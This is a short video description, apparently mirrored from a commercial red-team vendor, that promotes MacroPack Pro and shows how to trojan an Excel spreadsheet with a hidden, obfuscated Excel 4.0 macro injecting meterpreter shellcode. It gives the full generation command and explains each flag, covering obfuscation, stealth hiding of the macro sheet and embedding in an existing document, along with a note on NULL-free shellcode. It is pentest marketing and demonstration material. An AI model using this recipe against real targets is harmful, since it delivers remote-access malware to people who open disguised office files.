Redteam: Excel 4.0 XLM shellcode using MacroPack Pro

This video shows how to trojan an Excel sheet with a malicious XLM macro injecting a meterpreter shellcode.
This video was uploaded in the context of a blog post concerning addition of XLM payloads to MacroPack Pro (https://blog.sevagas.com/?EXCEL-4-0-XLM-macro-in-MacroPack-Pro)

In the video I first open the file, then I open it again after it is trojaned with XLM macro.

Here is the command line used to generate the payload:
echo meterx86_no0.bin | macro_pack.exe -t SHELLCODE -o --xlm --stealth -T samples\Risk_Mgt_ToolBox_v1.0.xls

The -o option is used to obfuscate the payload.
--xlm option is used to instruct MacroPack to use Excel 4.0 macro instead of classic VBA.
--stealth option will hide the XLM macro sheet
The -T option is used to trojan an existing document

Note that the shellcode has to be generated without NULL char.

The base XLM code is the MacroPack SHELLCODE template which is used to inject a given raw shellcode in memory.

Note that could have generated the same payload using classic macro instead of XLM by removing the --xlm option.

=========================================================================
MacroPack Pro is a tool for professional pentesters and redteamers.
More information is available at: https://www.balliskit.com
For more any inquiry, write to emeric.nasi [at] sevagas.com using a professional email address.

You can also check the limited community open source version here: https://github.com/sevagas/macro_pack
Follow us on Twitter at: https://twitter.com/BallisKit

Видео Redteam: Excel 4.0 XLM shellcode using MacroPack Pro канала Sevagas